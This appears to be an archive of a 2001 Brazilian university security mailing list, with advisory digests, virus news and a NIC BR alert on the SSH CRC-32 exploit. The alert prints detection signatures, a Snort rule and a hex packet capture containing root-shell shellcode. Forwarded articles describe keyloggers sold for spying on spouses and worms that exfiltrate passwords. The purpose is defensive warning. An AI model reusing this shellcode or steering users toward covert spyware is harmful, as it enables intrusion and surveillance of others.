From daniela em ccuec.unicamp.br Thu Nov 1 16:52:24 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Thu, 1 Nov 2001 16:52:24 -0200 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20011101165224.A20603@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 31/10/2001: ----------- SuSE Security Announcement (SuSE-SA:2001:38) Assunto: vulnerabilidade de seguranca no package "uucp". http://www.security.unicamp.br/docs/bugs/2001/10/v66.txt Red Hat Security Advisory (RHSA-2001:138-10) Assunto: Comprehensive Printing Update. http://www.security.unicamp.br/docs/bugs/2001/10/v67.txt Caldera Systems, Inc. Security Advisory (CSSA-2001-037.0) Assunto: Linux - libdb buffer overflow problem. http://www.security.unicamp.br/docs/bugs/2001/10/v68.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Thu Nov 1 16:52:51 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Thu, 1 Nov 2001 16:52:51 -0200 Subject: [SECURITY-L] Boletins de noticias Message-ID: <20011101165251.B20603@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e redes da Unicamp com os seguintes boletins de noticias e/ou revistas eletronicas: 31/10/2001: ----------- The SANS Weekly Security News Overview (Vol. 3, Num. 44) Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2001/10/b17.txt 01/11/2001: ----------- Módulo E-Security News (no. 216) Fonte: Módulo Security Solutions S/A http://www.security.unicamp.br/docs/informativos/2001/01/b1.txt -- Equipe de Seguranca em Sitemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Mon Nov 19 15:41:50 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Mon, 19 Nov 2001 15:41:50 -0200 Subject: [SECURITY-L] Vulnerabilidade remota no sshd sendo amplamente explorada Message-ID: <20011119154150.A3015@ccuec.unicamp.br> Srs. Administradores, Por favor, leiam atentamente esse alerta de seguranca do NIC-BR e tomem as devidas providencias. ----------- Forwarded message ---------- Date: Fri, 16 Nov 2001 20:24:41 -0200 From: NIC BR Security Office Reply-To: seguranca em pangeia.com.br To: seguranca em pangeia.com.br Subject: [S] Vulnerabilidade remota no sshd sendo amplamente explorada Alerta de Seguranca 2001-11-16 NIC BR Security Office Vulnerabilidade remota no sshd sendo amplamente explorada ========================================================= 1. Introducao O SSH e um protocolo que tem sido muito utilizado para substituir outras formas de login remoto. Nos ultimos meses diversos problemas de seguranca, em diversas versoes de ssh, foram relatados. Este alerta tem o intuito de: * reforcar a necessidade de atualizacao das versoes de ssh; * salientar que existem programas que exploram estas falhas e que estao sendo amplamente utilizados para comprometer maquinas vulneraveis; * mostrar assinaturas que podem ser uteis para identificar maquinas comprometidas. 2. Descricao Nas ultimas semanas aumentou o numero de maquinas que foram comprometidas por estarem com versoes vulneraveis do ssh. O NBSO teve acesso a diversos artefatos deixados por invasores em maquinas comprometidas. Dentre o material encontrado vale ressaltar a presenca de: * exploits para explorar a vulnerabilidade do "CRC-32 compensation attack"; * arquivos contendo mapeamento de versoes de sshd de diversas redes brasileiras e respectivas ferramentas de scan. Nessas mesmas redes foi possivel capturar a assinatura do exploit em acao. 3. Assinaturas Assinaturas de tentativas bem como de um ataque bem sucedido sao mostradas no Apendice e na secao "links adicionais". 4. Sistemas Afetados As seguintes versoes sao vulneraveis: OpenSSH: versoes menores que 2.3.0; ssh.com: versao 1.2.24 ate' 1.2.31 (ssh-2.x nao e' vulneravel) Mais detalhes bem como outras implementacoes de ssh afetadas estao listados no seguinte advisory da CORE-SDI: http://www.core-sdi.com/pressroom/advisories_desplegado.php?idx=81&idxsection=10 Para descobrir sua versao de ssh digite: ssh -V 5. Impacto Acesso de root remoto em maquinas rodando versoes vulneraveis de ssh. 6. Solucao Recomenda-se atualizar o ssh em uso para a ultima versao disponivel. 7. Informacoes adicionais Nesse mesmo periodo a comunidade internacional de seguranca tambem tem lancado alertas sobre o crescente numero de comprometimentos de maquinas atraves de versoes vulneraveis de ssh: * CERT/CC Incident Note IN-2001-12, "Exploitation of vulnerability in SSH1 CRC-32 compensation attack detector" http://www.cert.org/incident_notes/IN-2001-12.html * Vulnerability Note VU#945216, "SSH CRC32 attack detection code contains remote integer overflow" http://www.kb.cert.org/vuls/id/945216 8. Agradecimentos Pedro A M Vazquez Nelson Murilo Mario L Lacroix Fabio David Apendice Nas mensagens geradas pelo syslog de maquinas atacadas foram encontradas as entradas: foo sshd[xxxxx]: Disconnecting: Corrupted check bytes on input. foo sshd[xxxxx]: fatal: Local: Corrupted check bytes on input. foo sshd[xxxxx]: fatal: Local: crc32 compensation attack: network attack detected A seguinte regra do snort detecta a resposta de uma maquina comprometida com sucesso por este exploit: alert tcp any any -> any any (msg:"MISC - MISC - id check returned root"; content: "uid=0(root)";) Trecho de um ataque bem sucedido capturado via tcpdump. Esse trecho refere-se apenas a parte final quando o invasor obtem a shell de root: 17:52:53.658100 127.0.0.1.1182 > 127.0.0.1.22: tcp 1732 (DF) 0000: 4500 06f8 3274 4000 4006 038a 7f00 0001 E...2t em .@....... 0010: 7f00 0001 049e 0016 ed2e 58fb ed62 8b60 ..........X..b.` 0020: 8018 7960 9890 0000 0101 080a 0003 9637 ..y`...........7 0030: 0003 9637 9090 9090 9090 9090 9090 9090 ...7............ 0040: 9090 9090 9090 9090 9090 9090 9090 9090 ................ [ 98 linhas identicas apenas com NOPs (0x90) removidas] 0670: 9090 9090 9090 9090 9090 9090 9090 9090 ................ 0680: 31db b307 89e2 6a10 89e1 5152 68fe 0000 1.....j...QRh... 0690: 0089 e131 c0b0 66cd 80a8 ff74 0b5a f6c2 ...1..f....t.Z.. 06a0: ff74 4efe ca52 ebeb 5b31 c9b1 03fe c931 .tN..R..[1.....1 06b0: c0b0 3fcd 8067 e302 ebf3 6a04 6a00 6a12 ..?..g....j.j.j. 06c0: 6a01 53b8 6600 0000 bb0e 0000 0089 e1cd j.S.f........... 06d0: 806a 006a 0068 2f73 6800 682f 6269 6e8d .j.j.h/sh.h/bin. 06e0: 4c24 088d 5424 0c89 2189 e331 c0b0 0bcd L$..T$..!..1.... 06f0: 8031 c0fe c0cd 8000 .1...... 17:52:53.658606 127.0.0.1.22 > 127.0.0.1.1182: tcp 0 (DF) [tos 0x10] 0000: 4510 0034 3275 4000 4006 0a3d 7f00 0001 E..42u em .@..=.... 0010: 7f00 0001 0016 049e ed62 8b60 ed2e 5fbf .........b.`.._. 0020: 8010 1e40 63a0 0000 0101 080a 0003 9637 ... em c..........7 0030: 0003 9637 ...7 17:52:53.658813 127.0.0.1.22 > 127.0.0.1.1182: tcp 0 (DF) [tos 0x10] 0000: 4510 0034 3276 4000 4006 0a3c 7f00 0001 E..42v em .@..<.... 0010: 7f00 0001 0016 049e ed62 8b60 ed2e 5fbf .........b.`.._. 0020: 8010 3c80 4560 0000 0101 080a 0003 9637 ..<.E`.........7 0030: 0003 9637 ...7 17:52:53.659391 127.0.0.1.22 > 127.0.0.1.1182: tcp 0 (DF) [tos 0x10] 0000: 4510 0034 3277 4000 4006 0a3b 7f00 0001 E..42w em .@..;.... 0010: 7f00 0001 0016 049e ed62 8b60 ed2e 5fbf .........b.`.._. 0020: 8010 7900 08e0 0000 0101 080a 0003 9637 ..y............7 0030: 0003 9637 ...7 17:52:55.651755 127.0.0.1.1182 > 127.0.0.1.22: tcp 17 (DF) 0000: 4500 0045 3278 4000 4006 0a39 7f00 0001 E..E2x em .@..9.... 0010: 7f00 0001 049e 0016 ed2e 5fbf ed62 8b60 .........._..b.` 0020: 8018 7960 cbfa 0000 0101 080a 0003 96ff ..y`............ 0030: 0003 9637 6563 686f 2043 4852 4953 2043 ...7echo CHRIS C 0040: 4852 4953 0a HRIS. 17:52:55.652233 127.0.0.1.22 > 127.0.0.1.1182: tcp 12 (DF) [tos 0x10] 0000: 4510 0040 3279 4000 4006 0a2d 7f00 0001 E.. em 2y@. em ..-.... 0010: 7f00 0001 0016 049e ed62 8b60 ed2e 5fd0 .........b.`.._. 0020: 8018 7900 35dd 0000 0101 080a 0003 96ff ..y.5........... 0030: 0003 96ff 4348 5249 5320 4348 5249 530a ....CHRIS CHRIS. 17:52:55.652433 127.0.0.1.1182 > 127.0.0.1.22: tcp 68 (DF) 0000: 4500 0078 327a 4000 4006 0a04 7f00 0001 E..x2z em .@....... 0010: 7f00 0001 049e 0016 ed2e 5fd0 ed62 8b6c .........._..b.l 0020: 8018 7960 6f2f 0000 0101 080a 0003 96ff ..y`o/.......... 0030: 0003 96ff 6563 686f 3b20 6563 686f 2027 ....echo; echo ' 0040: 2a2a 2a2a 2a20 594f 5520 4152 4520 494e ***** YOU ARE IN 0050: 202a 2a2a 2a2a 273b 2065 6368 6f20 3b20 *****'; echo ; 0060: 686f 7374 6e61 6d65 203b 2075 6e61 6d65 hostname ; uname 0070: 202d 613b 2069 640a -a; id. 17:52:55.653006 127.0.0.1.22 > 127.0.0.1.1182: tcp 1 (DF) [tos 0x10] 0000: 4510 0035 327b 4000 4006 0a36 7f00 0001 E..52{@. em ..6.... 0010: 7f00 0001 0016 049e ed62 8b6c ed2e 6014 .........b.l..`. 0020: 8018 7900 fce5 0000 0101 080a 0003 96ff ..y............. 0030: 0003 96ff 0a ..... 17:52:55.653264 127.0.0.1.22 > 127.0.0.1.1182: tcp 23 (DF) [tos 0x10] 0000: 4510 004b 327c 4000 4006 0a1f 7f00 0001 E..K2|@. em ....... 0010: 7f00 0001 0016 049e ed62 8b6d ed2e 6014 .........b.m..`. 0020: 8018 7900 8bab 0000 0101 080a 0003 96ff ..y............. 0030: 0003 96ff 2a2a 2a2a 2a20 594f 5520 4152 ....***** YOU AR 0040: 4520 494e 202a 2a2a 2a2a 0a E IN *****. 17:52:55.653471 127.0.0.1.22 > 127.0.0.1.1182: tcp 1 (DF) [tos 0x10] 0000: 4510 0035 327d 4000 4006 0a34 7f00 0001 E..52}@. em ..4.... 0010: 7f00 0001 0016 049e ed62 8b84 ed2e 6014 .........b....`. 0020: 8018 7900 fccd 0000 0101 080a 0003 96ff ..y............. 0030: 0003 96ff 0a ..... 17:52:55.656806 127.0.0.1.22 > 127.0.0.1.1182: tcp 4 (DF) [tos 0x10] 0000: 4510 0038 327e 4000 4006 0a30 7f00 0001 E..82~@. em ..0.... 0010: 7f00 0001 0016 049e ed62 8b85 ed2e 6014 .........b....`. 0020: 8018 7900 3150 0000 0101 080a 0003 96ff ..y.1P.......... 0030: 0003 96ff 666f 6f0a ....foo. 17:52:55.660045 127.0.0.1.22 > 127.0.0.1.1182: tcp 65 (DF) [tos 0x10] 0000: 4510 0075 327f 4000 4006 09f2 7f00 0001 E..u2. em .@....... 0010: 7f00 0001 0016 049e ed62 8b89 ed2e 6014 .........b....`. 0020: 8018 7900 8e0d 0000 0101 080a 0003 96ff ..y............. 0030: 0003 96ff 4c69 6e75 7820 666f 6f20 322e ....Linux foo 2. 0040: 322e 3136 2d32 3220 2331 2054 7565 2041 2.16-22 #1 Tue A 0050: 7567 2032 3220 3136 3a34 393a 3036 2045 ug 22 16:49:06 E 0060: 4454 2032 3030 3020 6936 3836 2075 6e6b DT 2000 i686 unk 0070: 6e6f 776e 0a nown. 17:52:55.665203 127.0.0.1.22 > 127.0.0.1.1182: tcp 88 (DF) [tos 0x10] 0000: 4510 008c 3280 4000 4006 09da 7f00 0001 E...2. em .@....... 0010: 7f00 0001 0016 049e ed62 8bca ed2e 6014 .........b....`. 0020: 8018 7900 5a8d 0000 0101 080a 0003 9700 ..y.Z........... 0030: 0003 96ff 7569 643d 3028 726f 6f74 2920 ....uid=0(root) 0040: 6769 643d 3028 726f 6f74 2920 6772 6f75 gid=0(root) grou 0050: 7073 3d30 2872 6f6f 7429 2c31 2862 696e ps=0(root),1(bin 0060: 292c 3228 6461 656d 6f6e 292c 3328 7379 ),2(daemon),3(sy 0070: 7329 2c34 2861 646d 292c 3628 6469 736b s),4(adm),6(disk 0080: 292c 3130 2877 6865 656c 290a ),10(wheel). 17:52:55.671619 127.0.0.1.1182 > 127.0.0.1.22: tcp 0 (DF) 0000: 4500 0034 3281 4000 4006 0a41 7f00 0001 E..42. em .@..A.... 0010: 7f00 0001 049e 0016 ed2e 6014 ed62 8c22 ..........`..b." 0020: 8010 7960 05d7 0000 0101 080a 0003 9701 ..y`............ 0030: 0003 96ff .... -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO/eW+ukli63F4U8VAQH/bwP9Gsn8WHZQFHe2lF+vdPKJt390CHig5W59 qSX0azS5gbfx5biXeEQOay5k4L0MALkYbscQdZnpeA8OMsuV5VDtlIK+cDJTflTG V0ZbZIDT62m47Sd2RdInyE9hs0LQ5SDQBEZBCzfyjxkB61PDJlpYl/GfKPqPKdmq 6UZwEOtQ80U= =Lsv2 -----END PGP SIGNATURE----- From daniela em ccuec.unicamp.br Tue Nov 20 17:07:04 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Tue, 20 Nov 2001 17:07:04 -0200 Subject: [SECURITY-L] Atualizacao do site Message-ID: <20011120170704.A13163@ccuec.unicamp.br> Srs. Usuarios, O site da Equipe de Seguranca da Unicamp foi atualizado no item "Informativos sobre seguranca". Consultem em: http://www.security.unicamp.br/docs/informativos/index.html -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Wed Nov 21 10:45:00 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Wed, 21 Nov 2001 10:45:00 -0200 Subject: [SECURITY-L] Atualizacao do site - vulnerabilidades Message-ID: <20011121104500.A27320@ccuec.unicamp.br> Srs. Usuarios, O site da Equipe de Seguranca da Unicamp foi atualizado no item "Vulnerabilidades de seguranca". Consultem em: http://www.security.unicamp.br/docs/bugs/index.html -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Thu Nov 22 10:28:46 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Thu, 22 Nov 2001 10:28:46 -0200 Subject: [SECURITY-L] ICP-Brasil vira realidade Message-ID: <20011122102846.A7272@ccuec.unicamp.br> ----- Forwarded message from Nelson Murilo ----- From: Nelson Murilo Subject: [S] ICP-Brasil vira realidade To: seguranca em pangeia.com.br Date: Wed, 21 Nov 2001 20:20:11 -0200 [http://www.itweb.com.br/noticias/artigo.asp?id=17791] ICP-Brasil vira realidade -- 21/11/2001 -- Sistema vai ser inaugurado no próximo dia 27, nas instalações do Serpro, no RJ Carla Costa Muito já se questionou sobre a Infra-estrutura de Chaves Públicas Brasileira, ICP-Brasil, integrada ao Instituto Nacional de Tecnologia da Informação (ITI), e instituída pela medida provisória 2.200, de junho deste ano. A maior dúvida era sobre a funcionalidade deste sistema, contudo a medida provisória 2.200-2, de 24 de agosto, no artigo 1º, esclarece que a inciativa visa garantir a autenticidade, a integridade e a validade jurídica de documentos em forma eletrônica. A entrega das chaves pela ICP-Brasil, vai acontecer no próximo dia 27, nas instalações do Serviço Federal de Processamento de Dados, Serpro, no Rio de Janeiro, às 10 horas. Martins: documento digital dificulta fraudes Murilo Marques Barboza, diretor de telecomunicações da Presidência da República e participante do Comitê Gestor, explica que o rumor foi gerado por uma falta de compreensão de como isto vai ser aplicado no mercado.A ICP-Brasil não reserva ou monipoliza o mercado. É uma regulamentação mínima do setor de certificação digital, garantindo-lhe o necessário padrão de qualidade e mais segurança., diz Barboza. O governo já vem aplicando estas normas em seus órgãos e tem como objetivo expandir a iniciativa para todos os setores. Para o comandante Ivan N. Auzier, assessor do Gabinete de Segurança Institucional da Presidência da República e participante do comitê Gestor, há uma demonstração de cima para baixo, de como utilizar os documentos digitais. Toda documentação oficial dentro do governo é emitida de forma eletrônica, assegura o comandante. Os participantes do Comitê Gestor também esclarecem que a participação do Serpro é apenas operacional e que as normas impostas pela ICP-Brasil condizem com as internacionais, ou seja, se seguidas possibilitam a legalidade dos documentos eletrônicos emitidos no Brasil em outras partes do mundo e vice-versa. A finalidade desse sistema é oferecer uma alternativa eletrônica para realizar contratos e quaisquer outras transações que até agora exigiam registros em papel escrito para produzir efeitos legais. O sistema garante autenticidade e integridade dos documentos em formato eletrônico. Marco Martins, gerente de segurança de sistemas da Scopus, empresa especializada em segurança, diz que a Infra-estrutura de Chave Públicas é extremamente segura, garantindo a validade jurídica para as assinaturas digitais. Com a ICP-Brasil a confiabilidade e confidencialidade dos documentos digitais são garantidas, afirma Martins. O sistema utilizado para assegurar a autenticidade e a integridade dos documentos digitais é o de criptografia assimétrica, baseada em algorítmos que utilizam duas chaves diferentes e matematicamente relacionadas, uma para cifrar e outra para decifrar, de tal forma que aquilo que uma delas fizer somente a outra poderá desfazer. Um texto processado por uma das chaves somente pode ser recuperado se for processado pela outra. A chave privada é de uso exclusivo do titular do certificado, a chave pública é acessível a toda e qualquer cidadão usuário do sistema. Entenda os termos da ICP-Brasil Comitê Gestor . colegiado integrado pelo Governo Federal e por representantes da sociedade civil, é a autoridade gerenciadora de políticas. Autoridade Certificadora Raiz (AC Raiz) . primeira autoridade na cadeia de certificação, certifica apenas as Autoridades Certificadoras, exerce a função de fiscalização e auditoria em toda a ICP-Brasil. Autoridade Certificadora (AC). de personalidade jurídica pública ou privada, são entidades credenciadas a emitir, expedir, distribuir, revogar e gerenciar os certificados digitais, bem como colocar à disposição dos usuários listas de certificados revogados e outras informações pertinentes, além de manter registro de suas operações. Carla Costa é repórter de Intel Hot Site. ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Nov 22 10:30:03 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Thu, 22 Nov 2001 10:30:03 -0200 Subject: [SECURITY-L] Noticias CAIS: FBI desenvolve software que invade PC e espiona internautas Message-ID: <20011122103003.B7272@ccuec.unicamp.br> ----- Forwarded message from Jacomo Dimmit Boca Piccolini ----- From: Jacomo Dimmit Boca Piccolini Subject: [S] Noticias CAIS: FBI desenvolve software que invade PC e espiona internautas To: Date: Wed, 21 Nov 2001 09:33:58 -0200 (EDT) Noticias - Centro de Atendimento a Incidentes de Seguranca (CAIS/RNP) --------------------------------------------------------------------- [fonte:http://www.uol.com.br/folha/informatica/ult124u8577.shl] FBI desenvolve software que invade PC e espiona internautas FRANCISCO MADUREIRA Editor de Informática da Folha Online O FBI (polícia federal norte-americana) está desenvolvendo um programa para invadir computadores conectados à internet e introduzir vírus espiões em máquinas suspeitas, segundo o site de notícias MSNBC.com. Chamado "Lanterna Mágica", o software faz parte do projeto Carnívoro; grande rede de espionagem cibernética do governo dos Estados Unidos, que filtra comunicações digitais que cruzam o território norte-americano. Segundo fontes ouvidas pelo MSNBC.com, o software registra todos os comandos e palavras digitadas pelo usuário do computador invadido e depois os envia de volta para os computadores do FBI. Agentes acreditam que, com a combinação de informações, o método pode ajudar a encontrar criminosos. O "Lanterna Mágica" pode chegar por e-mail ou então utilizar brechas conhecidas em programas comuns para invadir o computador e registrar os comandos do usuário. Vigilância virtual A internet está lotada de programas que monitoram o uso do micro, gravam as teclas digitadas, tiram fotos da tela com uma certa frequência e, para encurtar ainda mais a rédea, mandam e-mails com relatórios e fotos para outros computadores. Um deles é o "Spector", que fotografa a tela do computador de 30 em 30 segundos. Ele fica escondido e só pode ser acessado por uma tecla de atalho determinada pelo espião. Depois de alguns dias de vigilância, o usuário acessa o programa e pode ver um "filme" com as telas gravadas. O "Spector" também mostra os aplicativos utilizados e permite salvar as telas como imagens BMP ou JPG. Se você quiser receber, na mesa de seu trabalho, relatórios sobre o que seu cônjuge ou seus filhos estão fazendo no micro, pode usar o "eBlaster". O programa funciona da mesma maneira que o "Spector", só que envia relatórios de 30 em 30 minutos para um determinado e-mail. Ambos estão em www.spectorsoft.com, e o "Spector" possui uma versão de testes (www.download.com) que pode ser utilizada por dez dias. Segundo a empresa fabricante dos programas, cerca de 50% dos compradores têm por objetivo monitorar o que os cônjuges fazem na internet. No mesmo estilo, ainda há o "007 Stealth Activity Recorder & Reporter". O soft fica escondido enquanto monitora o uso do PC e manda relatórios por e-mail. Há ainda programas gratuitos, como o "Key Interceptor", que grava todas as teclas digitadas no micro e só permite sua leitura com uma senha. Dá para saber os endereços visitados e o conteúdo dos e-mails. Outro é o "Info-Guardian", que fotografa a tela do PC de tempos em tempos. ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Nov 22 11:41:28 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Thu, 22 Nov 2001 11:41:28 -0200 Subject: [SECURITY-L] Documentacao util Message-ID: <20011122114128.F16396@ccuec.unicamp.br> RNP NewsGeneration Vol.5/No.5 Migrando Correio Eletrônico baseado em MS Exchange Server para Linux http://www.rnp.br/newsgen/0109/exchange2linux.shtml From daniela em ccuec.unicamp.br Thu Nov 22 12:17:25 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Thu, 22 Nov 2001 12:17:25 -0200 Subject: [SECURITY-L] =?iso-8859-1?Q?V=EDrus_que_infecta_apenas_com_leitura_de_e-mail_vira_''e?= =?iso-8859-1?Q?pidemia''?= Message-ID: <20011122121725.C11220@ccuec.unicamp.br> IDG Now! Daniel dos Santos Identificado em maio, o vírus Aliz não causou muitos transtornos. Porém, a Symantec alerta os internautas sobre uma “epidemia” da praga virtual, com mais de 2 mil casos de arquivos infectados só ontem. “É provável que o W32.Aliz.Worm tenha sido disseminado de forma intencional”, afirma José Antunes, engenheiro de sistemas da Symantec no Brasil. Segundo a empresa, a maior incidência até o momento foi registrada no Japão. Porém, a empresa Message Labs, que monitora e-mails para empresas, já encontrou o vírus em 44 países, com mais de mil casos registrados nas últimas 24 horas. A praga virtual, agora classificada pela Symantec como ameaça “nível 3” (na escala que vai até 5) é perigosa pelo fato de atacar mesmo sem o usuário clicar em arquivos. Basta visualizar a mensagem ou o e-mail aparecer no preview do Outlook para que o vírus entre em ação. Segundo a empresa, o vírus é enviado automaticamente por e-mail com o uso da lista de endereços do Windows Address Book. Com relação ao texto da mensagem, o campo de assunto é escolhido aleatoriamente combinando as opções abaixo: Fw: Fw: Re: Cool Nice Hot some Funny weird funky great Interesting many website site pics urls pictures stuff mp3s shit music info to check for you i found to see here - check it !! ! :-) ?! hehe ;-) Exemplo: Fw: Cool pictures - check it! Ao chegar ao computador da “vítima”, o vírus explora uma vulnerabilidade do relacionada ao padrão MIME (Multipurpose Internet Mail Extensions) que permite ao Aliz ser executado apenas com a leitura. A Microsoft possui um patch para corrigir essa vulnerabilidade. Para obtê-lo, clique aqui: http://www.microsoft.com/technet/security/bulletin/MS01-020.asp Versões atualizadas de antivírus reconhecem o invasor. No caso do computador já ter sido infectado, é necessário executar uma varredura completa do sistema com o programa de proteção e apagar os arquivos identificados como W32.Aliz.Worm. From daniela em ccuec.unicamp.br Fri Nov 23 15:57:12 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Fri, 23 Nov 2001 15:57:12 -0200 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20011123155712.A27920@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 21/11/2001: ----------- Mandrake Linux Security Update Advisory (MDKSA-2001:087) Assunto: vulnerabilidade de seguranca no package "expect". http://www.security.unicamp.br/docs/bugs/2001/11/v45.txt Mandrake Linux Security Update Advisory (MDKSA-2001:087) Assunto: vulnerabilidade de seguranca no package "squid". http://www.security.unicamp.br/docs/bugs/2001/11/v46.txt CERT Advisory (CA-2001-32) Assunto: Buffer Overflow in HP-UX Line Printer Daemon. http://www.security.unicamp.br/docs/bugs/2001/11/v47.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Fri Nov 23 16:18:07 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Fri, 23 Nov 2001 16:18:07 -0200 Subject: [SECURITY-L] Boletim de noticias Message-ID: <20011123161806.A1428@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e redes da Unicamp com os seguintes boletins de noticias e/ou revistas eletronicas: 21/11/2001: ----------- The SANS Weekly Security News Overview (Vol. 3, Num. 47) Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2001/11/b11.txt 22/11/2001: ----------- Módulo E-Security News (no. 219) Fonte: Módulo Security Solutions S/A http://www.security.unicamp.br/docs/informativos/2001/11/b12.txt 23/11/2001: ----------- LinuxSecurity Brasil Edição Especial (no. 33) Fonte: Linux Security http://www.security.unicamp.br/docs/informativos/2001/11/b13.html -- Equipe de Seguranca em Sitemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Tue Nov 27 10:33:10 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Tue, 27 Nov 2001 10:33:10 -0200 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20011127103310.A15221@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 22/11/2001: ----------- SuSE Security Announcement (SuSE-SA:2001:041) Assunto: vulnerabilidade de seguranca no package "susehelp". http://www.security.unicamp.br/docs/bugs/2001/11/v50.txt NetBSD Security Advisory 2001-018 Assunto: Remote Buffer Overflow Vulnerability in BSD Line Printer Daemon. http://www.security.unicamp.br/docs/bugs/2001/11/v51.txt 23/11/2001: ----------- SuSE Security Announcement (SuSE-SA:2001:042) Assunto: vulnerabilidade de seguranca no package "cyrus-sasl". http://www.security.unicamp.br/docs/bugs/2001/11/v52.txt 26/11/2001: ----------- Anúncio de segurança do Conectiva Linux (CLA-2001:436 - imp) Assunto: vulnerabilidade remota no webmail IMP. http://www.security.unicamp.br/docs/bugs/2001/11/v48.txt Mandrake Linux Security Update Advisory (MDKSA-2001:079-2) Assunto: vulnerabilidade de seguranca no "kernel". http://www.security.unicamp.br/docs/bugs/2001/11/v49.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Tue Nov 27 10:39:40 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Tue, 27 Nov 2001 10:39:40 -0200 Subject: [SECURITY-L] =?iso-8859-1?Q?Novo_v=EDrus_rouba_senhas_e_=E9_mais_r=E1pido_que_o_SirCa?= =?iso-8859-1?Q?m?= Message-ID: <20011127103940.B15468@ccuec.unicamp.br> From: "Paulo Serrano" Subject: Novo vírus rouba senhas e é mais rápido que o SirCam To: Date: Mon, 26 Nov 2001 12:55:00 -0200 X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Segunda-feira, 26 de Novembro de 2001 - 11h10 Fonte: IDG Now! Circula pela Internet um novo vírus com grande capacidade para causar transtornos. Trata-se do Badtrans.B, praga virtual que é enviada automaticamente por e-mail e traz um cavalo de Tróia, conhecido como PWS (destinado a roubar senhas do usuário). A Symantec, empresa que comercializa o Norton Antivirus, já classificou a ameaça como nível 3, em sua escala que vai até 5, por conta de seu grande potencial de disseminação e por já ter identificado vários casos. Só a MessageLabs, empresa que realiza serviço de checagem de e-mails para corporações, já identificou mais de 12 mil arquivos contaminados em apenas três dias, o que valeu a classificação de alto risco, com 100 novas mostras identificadas por minuto, superando o SirCam. Porém, a Trend Micro, por não ter recebido muitos comunicados até o momento, classifica a ameaça como “baixo risco”, O vírus chega por correio eletrônico com o campo de assunto em branco ou com "RE:" e um arquivo anexado que pode ter vários nomes, como Me_Nude.zip.scr e S3msong.mp3.pif. O objetivo de ter .zip.scr ou mp3.pif, por exemplo, é enganar o destinatário, que acredita estar recebendo um arquivo de música ou foto. Para criar o nome do arquivo, o vírus combina textos, relacionando partes entre as palavras abaixo: HUMOR DOCS S3MSONG ME_NUDE CARD SEARCHURL YOU_ARE_FAT! NEWS_DOC IMAGES PICS Já a primeira extensão pode ser .doc, .mp3 ou .zip, enquanto que a segunda é sempre .pif ou .scr. Com isso, surgem arquivos como card.doc.pif, news_doc.mp3.scr, etc. Para agravar a situação, começam a surgir versões com outros textos, como "Sorry about yesterday" e algumas funções diferentes. Segundo a Message Labs, não é preciso sequer clicar no arquivo anexado para que o vírus entre em ação. Basta ler a mensagem ou visualizar no preview do Outlook para que ele entre ação. Ao ser executado, ele passa a enviar e-mails contaminados e instala o cavalo de Tróia PSW, que rouba senhas do usuário e números de cartão de crédito, entre outras informações, pois monitora a digitação. Os dados confidencias são enviados para um hacker para endereços como ld8dl1 em mailandnews.com e uckyjw em hotmail.com. “O BadTrans.B está se propagando mais rápido que qualquer outro vírus que já vimos, superando inclusive o SirCam como o mais disseminado no momento”, afirma Mark Sunner, diretor de tecnologia da MessageLabs. Versões atualizadas de antivírus já identificam e brecam a ameaça. A Symantec também recomenda que as empresas criem filtros para bloquear todos os e-mails com extensões .scr e pif. Paulo Serrano GTTEC/CCUEC-Unicamp From daniela em ccuec.unicamp.br Tue Nov 27 10:43:54 2001 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti) Date: Tue, 27 Nov 